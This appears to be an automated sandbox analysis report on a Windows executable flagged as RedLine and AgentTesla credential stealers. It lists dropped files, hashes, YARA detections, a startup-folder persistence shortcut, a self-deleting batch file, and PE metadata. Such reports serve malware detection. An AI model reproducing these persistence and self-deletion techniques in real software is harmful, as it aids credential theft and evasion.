SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onejnghs.cdy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwbs0lqg.apu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_riklj0d0.mi3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umt1i2ma.zfq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\build.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	307712
Entropy (8bit):	5.081289674980977
Encrypted:	false
SSDEEP:	3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzZ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kv0L
MD5:	3B6501FEEF6196F24163313A9F27DBFD
SHA1:	20D60478D3C161C3CACB870AAC06BE1B43719228
SHA-256:	0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
SHA-512:	338E2C450A0B1C5DFEA3CD3662051CE231A53388BC2A6097347F14D3A59257CE3734D934DB1992676882B5F4F6A102C7E15B142434575B8970658B4833D23676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Sekoia.io
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

C:\Users\user\AppData\Local\Temp\neworigin.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	5.008874766930935
Encrypted:	false
SSDEEP:	3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
MD5:	D6A4CF0966D24C1EA836BA9A899751E5
SHA1:	392D68C000137B8039155DF6BB331D643909E7E7
SHA-256:	DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
SHA-512:	9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\server_BTC.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\tmpFD8B.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	5.006022103733226
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3Dt+kiE2J5xAIJWAdEFKDwU1hGDt+kiE2J5xAInTRIJLnLuVyI9:hWKdbuoLwkn23fJWAawDNewkn23fTmSn
MD5:	BB883EACA7A7592B4E96EC63ED6ECB55
SHA1:	60C4E8F9B67D0449BFD349F4A6C74982C578E3D8
SHA-256:	BCF16191E3791BC7BFAF289458492E162FAE39B33A3D57CC94B454BD09D83D95
SHA-512:	A08991286EA969D677EFFA9EC506C65356A801963BAB0F1360B23094204F61831C734D0646A1B5A710EDE148B3AA9CDB4D442EE6C52F9AF65DAB4C2823FEB3D2
Malicious:	false
Reputation:	unknown
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpFD8B.tmp.cmd" /f /q..

C:\Users\user\AppData\Roaming\3b4327877d6689f.bin

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.986187793073423
Encrypted:	false
SSDEEP:	384:DSKWrucjgTqKHd4ZYzPA95f197cJux8zVTH:DSKYK9H4f197EpzNH
MD5:	158D145E14EA9567A645A105A092AEFB
SHA1:	750387AB1625A0ED918EC8039CC17CEC50F31ADF
SHA-256:	744C135D0F6A708B7DDA6A9230E94C68AE3E8E97071FF38B4A4BB1C9F372F60B
SHA-512:	639860F134E9AEF22F66EE1C35E920B8907443422550E2B722FE068D32E1FCBD3E76E113B1B28FE8F39792EAE8335954FE1E834D39FBD35A9F4616CA18513AD0
Malicious:	true
Reputation:	unknown
Preview:	.\|@....\|5./.....F.j..0k!....~oC7+EQO.....kf..A..i.k{....C.....#.....l.$.#............i.y{..c....,`8....c...=/w.=...7id.[.twl...(2...h....Aqs..dK....$.g.e^..O4.[T..\|....tJ...>....../..iV.....^.....q.9.~...+...Y.5u.x..-...z.@.B..,:......=.....!.....c$.'..@....e..A.P..G........DK__...}..2.$..K.!v......F...8.OJ.....>h..~9.Z.."A;........".D....`....z`..."..,.c...h.'......[..........V. .1.rgW!4l.R..\|Yu......)...t.^yA..+N.....Q....O..Ji...x....T.<...$T...>~..rk.hL..T..X..u..=.....&>..P..5g._..@.E.-M.B.....4x...<H....q.5k..Z4...o..Sq...V..~.j.bX..#...........9(.....7............p..(...}J.Z}R.3.$)G..&i$AH....X.k....A=\.Ud...y.......M.2u#f..@..h......!...O..b..vaK..ueso..>\|4.x{Ff4.^9x'lW.2b....M.......w...o..Q..].B.ZD....E...7V.b;......."T.5F.....r...En...o.A.'x..o.X..o.nAO!.u..1..]o...e:y.'..?S...Q$....Tk.(.........8V...a.{..4..J....(\|....Jb..D.L...l.!...,..$]K<.2j..*m/.W....x..q..........-.Y.9HPK\.k....0v.T.1...Fm..)[.d.~....N...Z.....X.....m..

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Jan 10 14:01:28 2025, mtime=Fri Jan 10 14:01:28 2025, atime=Fri Jan 10 14:01:25 2025, length=231936, window=
Category:	dropped
Size (bytes):	1791
Entropy (8bit):	3.505130834847724
Encrypted:	false
SSDEEP:	24:8BHqt/+g1FW3GfIpA6Os4FSnk9lwO4ZTql5jTnBm:8BHY5QQIqi4+k9lwZTqllTB
MD5:	A0EA62372B6FFC8645BEAFA4A26899C3
SHA1:	13802BDA9CF4471FBA604380FF1A2E66273C02A2
SHA-256:	EC98FA0051F7D5761D98D3649EECECA37787D603C0F7A3C55884D78148BFC9F6
SHA-512:	2E8052A326B143F9F17932ECEF9AF3CD90CC0FEF5004F7D7EB364DA05AE9405CE2F5519C0728248064AF4EFC666AEC4802AB2DD9D36E2196FF846BAFB606D256
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ......pc.....pc..Y..pc............................:..DG..Yr?.D..U..k0.&...&......vk.v........pc......pc......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^Z+x...........................%..A.p.p.D.a.t.a...B.V.1.....Z-x..Roaming.@......CW.^Z-x..........................OCo.R.o.a.m.i.n.g.....T.1.....Z/x..ACCApi..>......Z/xZ/x...........................>..A.C.C.A.p.i.....l.2.....Z-x .TROJAN~1.EXE..P......Z/x*Z/x............................q.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......d...............-.......c............'C;.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.0.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe...............................................................................................................

C:\Users\user\RJKUWSGxej.exe

Download File

Process:	C:\Users\user\Desktop\RJKUWSGxej.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	2806272
Entropy (8bit):	7.618456800661759
Encrypted:	false
SSDEEP:	49152:9AodtaG9kS2U84B+FLan9k5TRM9zlgVjgg0YOm+3iZ1o1e4XTur23ANIS://B1pY/ZiDG2a
MD5:	5F573A664988C7AE35EC36F0E619728E
SHA1:	E9AF094474FDB64AE89014ABFD7FC67AFF7B4324
SHA-256:	5A1E020C5C5AD435E9BB8CD1D76D10A88F9312F2622DDCAF4B4B559E37E8A992
SHA-512:	6CA73EA44D42869BBD99CDD1BA6853C76531868D50E8CF75BCFA27EA67C9DE10D77FEA177F08C3343B34107784520CCDD8D1A2B05E00FEFE85E10F8800A38083
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E..E...D...E...D...E...E...E...DD..EI..D...EI..D...E................PE..d......f.........."....).n...`......,..........@..........................................`.............................................\............................................Z..T....................]..(....Y..@............................................text............................... ..`.managed(z.......\|.................. ..`hydrated.................................rdata..jl.......n...r..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc................*.............@..B................................................................................................................................................................

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	7.253755777341173
Encrypted:	false
SSDEEP:	24576:VQW4qoNUgslKNX0Ip0MgHCpoMBOuHsqjnhMgeiCl7G0nehbGZpbD:VQW9BKNX0IPgiKMBOubDmg27RnWGj
MD5:	CB68C66813352D55FED8EE293621ED26
SHA1:	984D7BA5BCA66D7E493DCEA1C14AB1DF7BAD9D0A
SHA-256:	1D6F485A20226F28FA3C4FF557EA6E596CF8ABE20ACF715526063C55672EA93C
SHA-512:	73A54C0E3CAF94392E7A00B5EA000081445A4C4B2BBE3562652D49A13E742F38E15FA735919631AF9F018C40B56FBB5D72CBE015386535E85686C9DEDC91D754
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	1224192
Entropy (8bit):	5.163563604770598
Encrypted:	false
SSDEEP:	24576:U2G7AbHjkEsqjnhMgeiCl7G0nehbGZpbD:U2G7AbHjVDmg27RnWGj
MD5:	D4E24D8F43F9CE7C83BFA8745C1BBC82
SHA1:	57E2D454069F8478FFA07AF00018C64995A2A93B
SHA-256:	DE61FBCCADCBBEEF0D67B0A5445541A66C002F70C1D19E7E9F766CE9EB15A522
SHA-512:	B01CA227931FC3302C18BF57A3A1E3FA7FB4E7FFE2C5C28EE05443E205BD8721E1482970EB639F2F91CEAAA28D0C6D5D544AC86D8D222B38698C5B52ECB75B0A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@......................................... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1225728
Entropy (8bit):	5.16331399278054
Encrypted:	false
SSDEEP:	12288:EEP3R6ZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/6ZsqjnhMgeiCl7G0nehbGZpbD
MD5:	D0C2B68B793CE73C9F58FC7242DA51A1
SHA1:	1F98B8339E984AAD73463FE2EDAAB39E318287F9
SHA-256:	42ABB173F0A62455F16EB952436FD53075145D5A1F1645541C48335C2FE74DDC
SHA-512:	AFDA70BBB4B31B4D41957C339D9D52F10A908B566D46B4440AD1C2C9AC31BF1084253C185F69C12F1D39726EFD746E8CA4B923CC55BB87F24F22FC876CB6A103
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Roaming\3b4327877d6689f.bin

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.982184591024572
Encrypted:	false
SSDEEP:	192:56izwjXB2rXDBRJJEDpalm+QiE1/4dX2Pg1fKPnnak8+gjfWDCW0tHO4put7ZGRM:EFXArXDBtSalmR1/4byYnu10pTeiRKf
MD5:	DDEB942098FF60F5BCDD528C70B3A4CB
SHA1:	6A793E8700DCE8DBDB8094D5E0B10F4D3E4B8584
SHA-256:	428086DC30766AFC15131F5968E30080763A0E06C657C76E2D1119EFA03A2E3A
SHA-512:	6F97261616D447A4F7B555D63010565B0EDA08F1CE897411EACAEA263E0B1B107EA6DF58A87688AAC083FBCFFAE05F873A9472ECD240D16243D1509E94248298
Malicious:	true
Reputation:	unknown
Preview:	T.s.Fj..e1..!...@..D.y..MT..#2..Wm..s.t.bp..#...x.Y...TY.-.R-.O........bq..../j...y.p.Z.\...".....v...t.B..v..ou.u....^cE..O_...q....Lo..32.2{.K.ifX.R.&...%g.~....LM.]pL.._..Y....V....?Q.2K%..).?iy..p...L........bxi.....]A..g.......@A.tJ0E.H.7.%u....;R..8D......n$..7...m..#.Ap....h..w..Q64A.E.1f.Q<..+CH.J...B.F.K.......Iwl..f..A.y..$. .}'..k.N&...%<..$........(.. q.F.7.Z..[3......H6[.AK...".........aT,...^.W..ZE........L..$..`.........Af.\|=?U..........BD...v..:y.X..e..._.?.x.....Ko.Zy...t....k.X<`....;T....~R...+KV..F..Pk..A.:.b....\..h...A40.!n#..F.I'i.z.._.y.'~.BN...i.%hX...WE.g..).@.dki.z4`t....1.[..d...$.L.@....B...B..6`~5.........6"..F..$..E.x'...x:......Mw.r..C.....q?...I..Ta.X.X].1P..$......5.%.Q1E2..G.o.........q..6.f...u...t....T.WX.R{.eNz.....)..V@....>.E'....JC..-.Z..9..!...7e..C T..M&}.._..s.Q.R(2.....>.Z.!.@....K.:.....SS,..>._.....Xd.........T.........)...t.t...\|P.....7IxC.N..W..l..G..?...D..T.+......g..;...jNB.

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Reputation:	unknown
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.618456800661759
TrID:	Win64 Executable GUI (202006/5) 77.37% InstallShield setup (43055/19) 16.49% Win64 Executable (generic) (12005/4) 4.60% Generic Win/DOS Executable (2004/3) 0.77% DOS Executable Generic (2002/1) 0.77%
File name:	RJKUWSGxej.exe
File size:	2'806'272 bytes
MD5:	5f573a664988c7ae35ec36f0e619728e
SHA1:	e9af094474fdb64ae89014abfd7fc67aff7b4324
SHA256:	5a1e020c5c5ad435e9bb8cd1d76d10a88f9312f2622ddcaf4b4b559e37e8a992
SHA512:	6ca73ea44d42869bbd99cdd1ba6853c76531868d50e8cf75bcfa27ea67c9de10d77fea177f08c3343b34107784520ccdd8d1a2b05e00fefe85e10f8800a38083
SSDEEP:	49152:9AodtaG9kS2U84B+FLan9k5TRM9zlgVjgg0YOm+3iZ1o1e4XTur23ANIS://B1pY/ZiDG2a
TLSH:	5BD5F119E3A811ECE527C674CB55A233E6B174560B21A4CF0B99C3452FB3EE16B7B312
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E...E...D...E...D...E...E...E...DD..EI..D...EI..D...E...............

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x14006ac2c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66E5ADB8 [Sat Sep 14 15:37:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	22a65106d3d84ea74d966fa0424a5a0c

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F5A9CAC37ACh
dec eax
add esp, 28h
jmp 00007F5A9CAC2FD7h
int3
int3
jmp 00007F5A9CAC3B28h
int3
int3
int3
dec eax
sub esp, 28h
call 00007F5A9CAC3B24h
jmp 00007F5A9CAC3164h
xor eax, eax
dec eax
add esp, 28h
ret
int3
int3
jmp 00007F5A9CAC314Ch
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F5A9CAC3172h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F5A9CAC3175h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F5A9CAC316Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F5A9CAC3176h
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
cmp ecx, dword ptr [00000049h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x17f3c0	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17f41c	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19c000	0x1504dc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x18f000	0xcdec	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2ed000	0x5b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x165ae0	0x54	.rdata
